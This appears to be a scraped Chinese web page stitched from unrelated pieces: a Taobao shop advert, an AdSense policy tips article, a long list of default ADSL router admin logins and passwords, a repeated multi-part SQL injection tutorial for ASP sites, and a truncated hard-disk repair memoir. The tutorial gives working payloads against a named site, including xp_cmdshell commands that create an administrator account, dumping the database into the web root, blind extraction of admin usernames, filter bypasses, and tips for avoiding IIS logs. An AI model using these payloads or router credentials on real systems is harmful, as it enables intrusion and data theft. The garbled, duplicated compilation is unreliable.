网店地址：http://shop35083950.taobao.com/

本店与实体店合作，保证进货渠道，注重商品品质和优质的服务；

所有商品价格均低于市场价格，本店秉承低价不低质的宗旨，竭诚为新老顾客提供一流的服务。

由于实体店出货较快，请拍商品前请务必与店主联系，确定是否有现货。

售前服务QQ：475883680  

MSN:liupeng-lyh@163.com

MSN购物群：mgroup52898@hotmail.com

电话：13391915007

售后服务1  QQ：475883680 

售后服务2  QQ：331546815    

Levi's501限量版众多潮人代言 破坏第5代 做旧顶级牛仔 原单品质   耐克NIKE DUNK SB 西装 休闲鞋板鞋 特价 原单品质   耐克NIKE DUNK SB 仪表 休闲鞋板鞋 原单品质 耐克NIKE DUNK SB 蓝勾 休闲鞋板鞋 原单品质   耐克NIKE DUNK SB 招财猫 运动鞋 原单品质   更多新品请访问：http://shop35083950.taobao.com/

陈冠希 cons 闪电 黑色 高帮 帆布 运动鞋 原单品质

新加坡潮牌 SCUM外星人 帽衫 浅灰色 原单品质

Neighborhood nbhd 古铜色棉马甲 原单品质

Clot 陈冠希示范 军用衬衣 WTAP 原单品质

新加坡潮牌 SCUM 棒球外套 原单品质

　　Google的Adsense广告计划是一个广受欢迎的广告产品，这个产品提供不少网站的最佳网上广告收入来源，关于Adsense的使用技巧方面的文章已经很多了，同时，Adsense也对参加这个广告计划服务制定了明确的服务条款政策，并要求大家严格遵守，以便Adsense帐号不会被Google除名。

　　我在访问网站和论坛的时候，我发现每天都会碰到一些滥用Adsense的情况，所以这里就列举一些使用Google Adsnese的小技巧，你可能已经直到其中一些，也可能知道得很少。这些都是从Google Adsense的计划政策中挑选出来的，并且进行了一些简化。

　　1、无论是任何原因，都不要点击你自己的Adsense广告。你应该很清楚的明白这一点。这是一个关闭你Adsense帐户的最佳途径。因此永远也不要告诉你公司同伙或朋友去点击广告。如果你的家人或孩子想通过帮你点击广告来增加你的收入，这会间接使你没有收入。更有甚者，不能设置点击奖励、使用自动点击工具、或者其它带有点击欺骗性质的软件，Adsense非常善于检测欺诈点击，如果你实在想要查看点击页面的效果，请使用Google广告预览工具。

　　2、永远不要改变Adsense的代码。我们有足够的手段来优化与定制Adsense的颜色，以适合你背景或边界的需求。在广告代码的外面增加你自己的代码，绝对不要在广告或者搜索代码里面瞎修改。你修改的内容他们会知道。搜索代码在颜色和放置的位置上有很多限制，但你必须遵守这些规则。如果违反规则，那些代码就可能停止工作。

　　3、不要在网页上放置超过3个广告单元和1个链接单元或者2个搜索广告框。无论如何，增加广告单元都不会出现新的广告内容了。但这些限制是他们要求的，那最好还是按照要求去做。

　　4、不要在同一个页面上放置和Google Adsense相竞争的类似的匹配文本广告或者搜索框。不要尝试创建一个和Adsense广告类似的链接结构。不要在带有Adsense搜索的页面上使用其它搜索工具。不过他们允许会员推介以及限定文字的链接。

　　5、不要透露你帐号的机密资料，例如CTR、CPM和单独广告单元的收入。不过，你可以透漏最近一次所获得的总体收入。

　　6、广告标题标签只能是“赞助商链接”或者“广告”。其他的标签都是不允许的。我看过很多网站的广告标签写的是其他内容，不应该使用这种方法来吸引别人的眼球。

　　7、不要将广告点击设置为默认打开新页面。Adsense的广告应该在同一个页面里打开，你可能已经使用“base target”标签使得默认所有链接都打开新窗口或某个帧，那么现在就快去修改代码吧，他们是不愿意广告在新窗口内打开的。

　　8、不要建立多个Adsense帐号。一个帐号可以在多个网站上使用，你不需要为5个不同的网站创造5个帐号，一个帐号就能完成一切。如果害怕某个帐号因为违反规则而被关闭，那么相信我，他们会将你所有关联帐号都关闭的。你可以利用渠道来跟踪点击与实时统计。他们会在新的网站上自动侦测并显示相关广告。

　　9、只在有内容的页面放置广告。广告商只为内容付费，内容驱动相关广告，尽管你会从一些错误登录、注册、感谢页面或者欢迎页内容等等中得到一些点击，但是你会因此被请出Adsense。

　　10、不要隐藏广告元素。更改广告颜色和边界可以很容易将广告融入网站页面。我见过很多网站将广告地址设置为背景颜色。虽然将广告和你的网站融合是个好主意，但是隐藏广告的相关元素是不允许的。因此也不要使用漂浮图片、弹出窗口、表格等挡住广告内容。

　　11、不要通过电子邮件发送Adsense广告。当然HTML格式电子邮件可以使得Adsense的Javascrīpt广告显示出来，但是这违反了计划政策。你不能让广告内容在邮件里显示出来，哪怕只有一次，他们在看着呢。

　　12、审核你的网站内容。Adsense不允许这样几个内容的页面放置广告：MP3 、视频、新闻组和图像结果等内容的网页。也排除任何色情、仇恨与暴力，或非法内容。

　　13、不要在广告点击或者搜索后改变输出结果。确保你不以任何方式改变用户点击广告的那个网站。不要使用框架、最小化、重定向或者其他有可能改变广告页面或者搜索页面用户点击后的显示结果。

　　14、避免过多的广告及关键字堆砌。尽管这可能是一个比较特殊的灰色地带并且需要斟酌考虑现实，不过现在Google Adsense已经修改了广告显示方式，你只要关注内容并提高流量就可以得到比其他广告商更多的收入，所以不需要放太多的广告。关键字堆砌可以使得目标广告更准确，但应该适可而止。

　　15、确认你支持语言。Adsense支持“ZhongGuo（简体）、日文、丹麦、韩国、荷兰、挪威、英国、波兰、芬兰、葡萄牙、法国、俄罗斯、德国、西班牙、匈牙利、瑞典、意大利和土耳其”。另外，Adsense搜索广告可以支持捷克、ZhongGuo繁体。如果你的网页不支持这些语言，那么就不要使用这类代码。

　　16、每个网页上，在以上所述的广告单元，搜索框，和链接单元以外，可以投放一个同类推介按钮。

　　17、不要将Google的广告做为候补广告。当目标广告不能显示的时候，少数服务允许你防止候补广告。这需要建立一个简单的HTML网页，将广告代码放进去。Aadsense允许使用这个链接显示其他广告而不是展示公益广告，但从未用Adsense广告作为候补广告。

　　18、不要在广告单元旁放置可能引起误导的图片。这是一个为了提高点击率所广泛使用的一个方法，在广告文字旁增加同类型的图片，这将给人产生印象是这些图片和广告是相关联的，并产生误导或者虚假广告点击。在图片和文字广告旁插入一个分割线或空格也不行。你必须要让广告画面排列方式并不容易误导或迷惑你网站的用户。

　　有什么疑问的时候，最好还是求助于Adsense的帮助人员，并了解Google相关的Adsense计划政策，他们是很有帮助的！

ViKing
用户名:adsl 密码:adsl1234

实达
默认IP：192.168.10.1
用户名：admin 密码：conexant
实达 2110ehr v4.5
用户名：root 密码：grouter

实达 2110eh v3.51
用户名：admin 密码：starnetadsl

艾玛
默认IP：192.168.101.1
用户名：admin 密码：admin

华硕

192.168.1.1

用户名：adsl 密码：adsl1234

神州数码 DCAD-6010RA V6
http://192.168.1.1/
用户名为ADSL，密码为ADSL1234

神州数码 DCAD-6010RA V5
192.168.1.1
admin admin1234

全向 QL1680
10.0.0.2
用户名是admin出厂时默认值：密码是qxcomm1680，管理员密码是 qxcommsupport

全向 QL1688
10.0.0.2
用户名为admin；出厂时默认值：密码为qxcomm1688

全向 QL1880
192.168.1.1
用户名是root出厂时默认值：密码是root

全向 qxcomm1688
http://192.168.1.1/
用户名为admin 高端设置密码是：qxcommsuport

全向 qxcomm1680
http://192.168.1.1/
登陆ADSL的密码是:qxcomm1680

普天 ISIN6161-RT
用户名：putian 密码：123456

普天 ISIN6161-BE
用户名：putian 密码：123456

重庆普天CP ADSL03
http://192.168.1.1/
用户名:root
密码:root

etek-td ADSL_T07L006.0
http://192.168.1.1/
用户名: supervisor
密码: 12345

合勤 zyxel 642
在运行输入telnet 192.168.1.1
密码1234,

北电
用户名:anonymous 密码:12345

大恒
用户名：admin 密码：admin

大唐
用户名：admin 密码：1234

斯威特
用户名：root 密码：root
用户名：user 密码：user

中兴

ZXDSL831
用户名:ZXDSL/adsl
密码:zxdsl/adsl831

ZXDSL831B
用户名:ZXDSL/adsl
密码:zxdsl/adsl831

BENQ
用户名：user 密码：benq1234

伊泰克
http://192.168.1.1/
用户名：supervisor
密码：12345

阿尔卡特
http://192.168.1.1/
一般没有密码

义成(同维) DSL699E 699EA
http://192.168.1.1/
用户名：ROOT
密码：ROOT

大亚 DB102 DB108
http://192.168.1.1/
用户名：admin
密码：dare
高级设置界面：http://192.168.1.1/ doc/index1.htm

WST RT1080
http://192.168.0.1/
username:root
password:root

WST ART18CX
http://10.0.0.2/
username:admin
password:conexant
username:user
password ：password

泛德
admin
conexant

东信 Ea700
http://192.168.1.1/
用户名：空
密码：password

broadmax hsa300a
http://192.168.0.1/
username:broadmax
password:broadmax

长虹 ch-500E
http://192.168.1.1/
username:root
password:root

台湾突破 EA110
RS232:38400
http://192.168.7.1/
username SL
psw SL

GVC DSL-802E/R3A
http://10.0.0.2/
username:admin
password:epicrouter
username:user
password assword

科迈易通 km300A-1
http://192.168.1.1/
username: password,command
passwordassword

科迈易通 km300A-G
http://192.168.1.1/
username:root
password:root

科迈易通 km300A-A
http://192.168.1.1/
username:root/admin (armandb,PINKLACE,command
password:123456/root

科迈易通 KM300A-AB
192.168.1.1
admin/root
root/123456

sunrise SR-DSL-AE
http://192.168.1.1/
username:admin
password:0000

sunrise DSL-802E_R3A
http://10.0.0.2/
username:admin
password:epicrouter
username:user
password assword

UT斯达康 ut-300R
http://192.168.1.1/
username:root or admin
password:utstar


CyberLink 6307/6309KG
它使用在随Cyberlink6307/6309KG带的光盘中DSLCom.exe
出厂时默认值：路由IP地址 : 192.168.1.1密码 : stm

TP-LINK TD-8800
192.168.1.1
户名admin,密码admin


Ecom ED-802EG
在IE输入192.168.1.1
用户名和密码都为root

神州数码 6010RA
在IE输入192.168.1.1
用户名为ADSL，密码为ADSL1234

华为Huawei SmartAX MT800
初始IP是192.168.1.1
用户名ADMIN 密码admin/epicrouter
恢复默认配置的方法有两种，一种是连续按MODEM背后的RESET键三 次
另一种是在配置菜单的SAVE&REBOOT里选择恢复默认配置。

湖北邮通
IP:10.0.0.2
Username:admin
Password:epicrouter

亨威NSM500网速通
IP:192.168.1.1
Username:root
Password:root

SpeedTouch]
root
root

中达电通 CT500-B
root
12345

中达电通 CT500-R
root
12345

天邑 HASB-100
admin
admin/epicrouter

星网锐捷 ADSL2110EH
192.168.10.1
root/admin

ADSL2110EH
192.168.10.1
root/admin

银河信息 AAM6000EV（华硕）
192.168.1.1
adsl adsl1234

港湾网络 HA1000-TR home gateway
192.168.1.1
admin harbour

格林耐特 GRT1500R GS8120/GS3780 green net
192.168.1.1
root 12345

格林耐特 GRT1500 AD6485/AD6488 green net
192.168.1.1
root 12345

友讯电子有限公司 DSL-500 DSL-200 DSL-300
192.168.1.1
admin admin

斯维特新 SLA8000D SLA8000 SVT508
192.168.1.1
root root

探索者 KD318
10.0.0.2
admin conexant

全创 AccessLinker 1100
10.0.0.2
admin epicrouter

世博资讯 2610 Conexant
10.0.0.2
admin password

金瑞迪 RA-800 Router
192.168.1.1
root 12345

金瑞迪 RA-800 Modem
192.168.1.1
root 12345

Home Gateway
用户名:admin
密码：conexant

看完入门篇和进阶篇后，稍加练习，破解一般的网站是没问题了。但如果碰到表名列名猜不到，或程序作者过滤了一些特殊字符，怎么提高注入的成功率？怎么样提高猜解效率？请大家接着往下看高级篇。 第一节、利用系统表注入SQLServer数据库 SQLServer是一个功能强大的数据库系统，与操作系统也有紧密的联系，这给开发者带来了很大的方便，但另一方面，也为注入者提供了一个跳板，我们先来看看几个具体的例子： ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”-- 　　分号;在SQLServer中表示隔开前后两句语句，--表示后面的语句为注释，所以，这句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储过程xp_cmdshell，这个存储过程用于调用系统命令，于是，用net命令新建了用户名为name、密码为password的windows的帐号，接着： ② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”-- 　　将新建的帐号name加入管理员组，不用两分钟，你已经拿到了系统最高权限！当然，这种方法只适用于用sa连接数据库的情况，否则，是没有权限调用xp_cmdshell的。 　　③ http://Site/url.asp?id=1 ;;and db_name()>0 前面有个类似的例子and user>0，作用是获取连接用户名，db_name()是另一个系统变量，返回的是连接的数据库名。 ④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;-- 这是相当狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的绝对路径，将数据库备份到Web目录下面，再用HTTP把整个数据库就完完整整的下载回来，所有的管理员及用户密码都一览无遗！在不知道绝对路径的时候，还可以备份到网络地址的方法（如\\202.96.xx.xx\Share\1.db），但成功率不高。 　　⑤ http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0 前面说过，sysobjects是SQLServer的系统表，存储着所有的表名、视图、约束及其它对象，xtype=’U’ and status>0，表示用户建立的表名，上面的语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。第二、第三个表名怎么获取？还是留给我们聪明的读者思考吧。 ⑥ http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0 从⑤拿到表名后，用object_id(‘表名’)获取表名对应的内部ID，col_name(表名ID,1)代表该表的第1个字段名，将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。 　　以上6点是我研究SQLServer注入半年多以来的心血结晶，可以看出，对SQLServer的了解程度，直接影响着成功率及猜解速度。在我研究SQLServer注入之后，我在开发方面的水平也得到很大的提高，呵呵，也许安全与开发本来就是相辅相成的吧。 第二节、绕过程序限制继续注入 在入门篇提到，有很多人喜欢用’号测试注入漏洞，所以也有很多人用过滤’号的方法来“防止”注入漏洞，这也许能挡住一些入门者的攻击，但对ＳＱＬ注入比较熟悉的人，还是可以利用相关的函数，达到绕过程序限制的目的。 在“ＳＱＬ注入的一般步骤”一节中，我所用的语句，都是经过我优化，让其不包含有单引号的；在“利用系统表注入SQLServer数据库”中，有些语句包含有’号，我们举个例子来看看怎么改造这些语句： 简单的如where xtype=’U’，字符U对应的ASCII码是85，所以可以用where xtype=char(85)代替；如果字符是中文的，比如where name=’用户’，可以用where name=nchar(29992)+nchar(25143)代替。 第三节、经验小结 1.有些人会过滤Select、Update、Delete这些关键字，但偏偏忘记区分大小写，所以大家可以用selecT这样尝试一下。 2.在猜不到字段名时，不妨看看网站上的登录表单，一般为了方便起见，字段名都与表单的输入框取相同的名字。 3.特别注意：地址栏的+号传入程序后解释为空格，%2B解释为+号，%25解释为%号，具体可以参考URLEncode的相关介绍。 4.用Get方法注入时，IIS会记录你所有的提交字符串，对Post方法做则不记录，所以能用Post的网址尽量不用Get。 5. 猜解Access时只能用Ascii逐字解码法，SQLServer也可以用这种方法，只需要两者之间的区别即可，但是如果能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大的提高。 防 范 方 法 ＳＱＬ注入漏洞可谓是“千里之堤，溃于蚁穴”，这种漏洞在网上极为普遍，通常是由于程序员对注入不了解，或者程序过滤不严格，或者某个参数忘记检查导致。在这里，我给大家一个函数，代替ASP中的Request函数，可以对一切的SQL注入Say NO，函数如下： Function SafeRequest(ParaName,ParaType) '--- 传入参数 --- 'ParaName:参数名称-字符型 'ParaType:参数类型-数字型(1表示以上参数是数字，0表示以上参数为字符) Dim ParaValue ParaValue=Request(ParaName) If ParaType=1 then If ParaValue="" or not isNumeric(ParaValue) then Response.write "参数" & ParaName & "必须为数字型！" Response.end End if Else ParaValue=replace(ParaValue,"'","''") End if SafeRequest=ParaValue End function 文章到这里就结束了，不管你是安全人员、技术爱好者还是程序员，我都希望本文能对你有所帮助。

第一节、SQL注入的一般步骤

首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。

其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：

(A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

(C) 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’， 即是生成语句：
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

接着，将查询条件替换成SQL语句，猜解表名，例如：

ID=49 And (Select Count(*) from Admin)>=0

如果页面就与ID=49的相同，说明附加条件成立，即表Admin存在，反之，即不存在（请牢记这种方法）。如此循环，直至猜到表名为止。

表名猜出来后，将Count(*)替换成Count(字段名)，用同样的原理猜解字段名。

有人会说：这里有一些偶然的成分，如果表名起得很复杂没规律的，那根本就没得玩下去了。说得很对，这世界根本就不存在100%成功的黑客技术，苍蝇不叮无缝的蛋，无论多技术多高深的黑客，都是因为别人的程序写得不严密或使用者保密意识不够，才有得下手。

有点跑题了，话说回来，对于SQLServer的库，还是有办法让程序告诉我们表名及字段名的，我们在高级篇中会做介绍。

最后，在表名和列名猜解成功后，再使用SQL语句，得出字段的值，下面介绍一种最常用的方法－Ascii逐字解码法，虽然这种方法速度很慢，但肯定是可行的方法。

我们举个例子，已知表Admin中存在username字段，首先，我们取第一条记录，测试长度：

http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0

先说明原理：如果top 1的username长度大于0，则条件成立；接着就是>1、>2、>3这样测试下去，一直到条件不成立为止，比如>7成立，>8不成立，就是len(username)=8

当然没人会笨得从0,1,2,3一个个测试，怎么样才比较快就看各自发挥了。在得到username的长度后，用mid(username,N,1)截取第N位字符，再asc(mid(username,N,1))得到ASCII码，比如：

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步缩小范围的方法得到第1位字符的ASCII码，注意的是英文和数字的ASCII码在1-128之间，可以用折半法加速猜解，如果写成程序测试，效率会有极大的提高。

第二节、SQL注入常用函数

有SQL语言基础的人，在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平，特别是一些常用的函数及命令。

Access：asc(字符) SQLServer：unicode(字符)
作用：返回某字符的ASCII码

Access：chr(数字) SQLServer：nchar(数字)
作用：与asc相反，根据ASCII码返回字符

Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L)
作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串

Access：abc(数字) SQLServer：abc (数字)
作用：返回数字的绝对值（在猜解汉字的时候会用到）

Access：A between B And C SQLServer：A between B And C
作用：判断A是否界于B与C之间

第三节、中文处理方法

在注入中碰到中文字符是常有的事，有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解，“中文恐惧症”很快可以克服。

先说一点常识：

Access中，中文的ASCII码可能会出现负数，取出该负数后用abs()取绝对值，汉字字符不变。

SQLServer中，中文的ASCII为正数，但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()返回unicode值，再用nchar函数取得对应的中文字符。

    随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。

    SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。

   但是，SQL注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。

   根据国情，国内的网站用ASP+Access或SQLServer的占70%以上，PHP+MySQ占L20%，其他的不足10%。在本文，我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧，PHP注入的文章由NB联盟的另一位朋友zwell撰写，希望对安全工作者和程序员都有用处。了解ASP注入的朋友也请不要跳过入门篇，因为部分人对注入的基本判断方法还存在误区。大家准备好了吗？Let's Go...

入 门 篇

   如果你以前没试过SQL注入的话，那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。

第一节、SQL注入原理

   以下我们从一个网站www.19cn.com开始（注：本文发表前已征得该站站长同意，大部分都是真实数据）。

   在网站首页上，有名为“IE不能打开新窗口的多种解决方法”的链接，地址为：http://www.19cn.com/showdetail.asp?id=49，我们在这个地址后面加上单引号’，服务器会返回下面的错误提示：

Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'ID=49'' 中。
/showdetail.asp，行8

从这个错误提示我们能看出下面几点：

1.网站使用的是Access数据库，通过JET引擎连接数据库，而不是通过ODBC。
2.程序没有判断客户端提交的数据是否符合程序要求。
3.该SQL语句所查询的表中有一名为ID的字段。

从上面的例子我们可以知道，ＳＱＬ注入的原理，就是从客户端提交特殊的代码，从而收集程序及服务器的信息，从而获取你想到得到的资料。

第二节、判断能否进行ＳＱＬ注入

看完第一节，有一些人会觉得：我也是经常这样测试能否注入的，这不是很简单吗？其实，这并不是最好的方法，为什么呢？

首先，不一定每台服务器的IIS都返回具体错误提示给客户端，如果程序中加了cint(参数)之类语句的话，ＳＱＬ注入是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。

其次，部分对ＳＱＬ注入有一点了解的程序员，认为只要把单引号过滤掉就安全了，这种情况不为少数，如果你用单引号测试，是测不到注入点的

那么，什么样的测试方法才是比较准确呢？答案如下：

① http://www.19cn.com/showdetail.asp?id=49
② http://www.19cn.com/showdetail.asp?id=49 and 1=1
③ http://www.19cn.com/showdetail.asp?id=49 and 1=2

这就是经典的1=1、1=2测试法了，怎么判断呢？看看上面三个网址返回的结果就知道了：

可以注入的表现：

① 正常显示（这是必然的，不然就是程序有错误了）
② 正常显示，内容基本与①相同
③ 提示BOF或EOF（程序没做任何判断时）、或提示找不到记录（判断了rs.eof时）、或显示内容为空（程序加了on error resume next）

   不可以注入就比较容易判断了，①同样正常显示，②和③一般都会有程序定义的错误提示，或提示类型转换时出错。

   当然，这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字符型和搜索型参数，我将在中级篇的“ＳＱＬ注入一般步骤”再做分析。

第三节、判断数据库类型及注入方法

   不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer，网上超过99%的网站都是其中之一。

   怎么让程序告诉你它使用的什么数据库呢？来看看：

   SQLServer有一些系统变量，如果服务器IIS提示没关闭，并且SQLServer返回错误提示的话，那可以直接从出错信息获取，方法如下：

http://www.19cn.com/showdetail.asp?id=49 and user>0

   这句语句很简单，但却包含了SQLServer特有注入方法的精髓，我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常的，重点在and user>0，我们知道，user是SQLServer的一个内置变量，它的值是当前连接的用户名，类型为nvarchar。拿一个nvarchar的值跟int的数0比较，系统会先试图将nvarchar的值转成int型，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar值 ”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc正是变量user的值，这样，不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语句。

   顺便说几句，众所周知，SQLServer的用户sa是个等同Adminstrators权限的角色，拿到了sa权限，几乎肯定可以拿到主机的Administrator了。上面的方法可以很方便的测试出是否是用sa登录，要注意的是：如果是sa登录，提示是将”dbo”转换成int的列发生错误，而不是”sa”。

   如果服务器IIS不允许返回错误提示，那怎么判断数据库类型呢？我们可以从Access和SQLServer和区别入手，Access和SQLServer都有自己的系统表，比如存放数据库中所有对象的表，Access是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表[sysobjects]中，在Web环境下可正常读取。

在确认可以注入的情况下，使用下面的语句：

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

   如果数据库是SQLServer，那么第一个网址的页面与原页面http://www.19cn.com/showdetail.asp?id=49是大致相同的；而第二个网址，由于找不到表msysobjects，会提示出错，就算程序有容错处理，页面也与原页面完全不同。

   如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提示时的验证。

 

第一节、SQL注入的一般步骤

首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。

其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：

(A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

(C) 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’， 即是生成语句：
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

接着，将查询条件替换成SQL语句，猜解表名，例如：

ID=49 And (Select Count(*) from Admin)>=0

如果页面就与ID=49的相同，说明附加条件成立，即表Admin存在，反之，即不存在（请牢记这种方法）。如此循环，直至猜到表名为止。

表名猜出来后，将Count(*)替换成Count(字段名)，用同样的原理猜解字段名。

有人会说：这里有一些偶然的成分，如果表名起得很复杂没规律的，那根本就没得玩下去了。说得很对，这世界根本就不存在100%成功的黑客技术，苍蝇不叮无缝的蛋，无论多技术多高深的黑客，都是因为别人的程序写得不严密或使用者保密意识不够，才有得下手。

有点跑题了，话说回来，对于SQLServer的库，还是有办法让程序告诉我们表名及字段名的，我们在高级篇中会做介绍。

最后，在表名和列名猜解成功后，再使用SQL语句，得出字段的值，下面介绍一种最常用的方法－Ascii逐字解码法，虽然这种方法速度很慢，但肯定是可行的方法。

我们举个例子，已知表Admin中存在username字段，首先，我们取第一条记录，测试长度：

http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0

先说明原理：如果top 1的username长度大于0，则条件成立；接着就是>1、>2、>3这样测试下去，一直到条件不成立为止，比如>7成立，>8不成立，就是len(username)=8

当然没人会笨得从0,1,2,3一个个测试，怎么样才比较快就看各自发挥了。在得到username的长度后，用mid(username,N,1)截取第N位字符，再asc(mid(username,N,1))得到ASCII码，比如：

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步缩小范围的方法得到第1位字符的ASCII码，注意的是英文和数字的ASCII码在1-128之间，可以用折半法加速猜解，如果写成程序测试，效率会有极大的提高。

第二节、SQL注入常用函数

有SQL语言基础的人，在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平，特别是一些常用的函数及命令。

Access：asc(字符) SQLServer：unicode(字符)
作用：返回某字符的ASCII码

Access：chr(数字) SQLServer：nchar(数字)
作用：与asc相反，根据ASCII码返回字符

Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L)
作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串

Access：abc(数字) SQLServer：abc (数字)
作用：返回数字的绝对值（在猜解汉字的时候会用到）

Access：A between B And C SQLServer：A between B And C
作用：判断A是否界于B与C之间

第三节、中文处理方法

在注入中碰到中文字符是常有的事，有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解，“中文恐惧症”很快可以克服。

先说一点常识：

Access中，中文的ASCII码可能会出现负数，取出该负数后用abs()取绝对值，汉字字符不变。

SQLServer中，中文的ASCII为正数，但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()返回unicode值，再用nchar函数取得对应的中文字符。

1995年，偶然在同事那里见到一个陌生的物件，好奇地问那是什么，朋友答："这是电脑用的硬盘！" 这就是高朋第一次认识硬盘的经过。
 
几年下来，单位的电脑越来越多，电脑问题也随之多起来，高朋便有机会研究PC的维护。在维护过程中，由于硬盘出问题是较多的, 尤其是出坏道的情况更是令人。于是，高朋查遍图书馆、新华书店的计算机类图书，研究坏道修复的方法。令人失望的是，各种书刊上所说的方法大同小异（怀疑有传抄之嫌），不仅用处不大，而且严重误导读者。
 
多年来一直误导着高朋的几个常识性问题是：
 
1． 硬盘逻辑坏道可以修复，而物理坏道不可修复。实际情况是，坏道并不分为逻辑坏道和物理坏道，不知道谁发明这两个概念，反正厂家提供的技术资料中都没有这样的概念，倒是分为按逻辑地址记录的坏扇区和按物理地址记录的坏扇区。
 
2． 硬盘出厂时没有坏道，用户发现坏道就意味着硬盘进入危险状态。实际情况是，每个硬盘出厂前都记录有一定数量的坏道，有些数量甚至达到数千上万个坏扇区，相比之下，用户发现一两个坏道算多大危险？
 
3． 硬盘不认盘就没救，0磁道坏可以用分区方法来解决。实际情况是，有相当部分不认的硬盘也可以修好，而0磁道坏时很难分区。
 
如此误导，如不是自己搜集研究外文资料并长期实践，说不准还长期拿来作信条呢。 在国外有许多的专业的硬盘维修论坛，在那里你可以发现有一些国家的硬盘维修技术达到了很高水准。我敢肯定，他们的一些技术会令众多硬盘厂家头痛不已。和世界上众多专业硬盘修理高手交流，使高朋受益菲浅。 这三年来，高朋辞去教师工作，专门从事硬盘修复工作，经手修复的硬盘已超过万个。
 
总结起来，高朋的技术来源有三方面：
 
1. 搜集国外技术资料与国外专业人士交流；
2. 购买专业工具软件（有同步技术更新支持）；
3. 自己的实践经验。
 
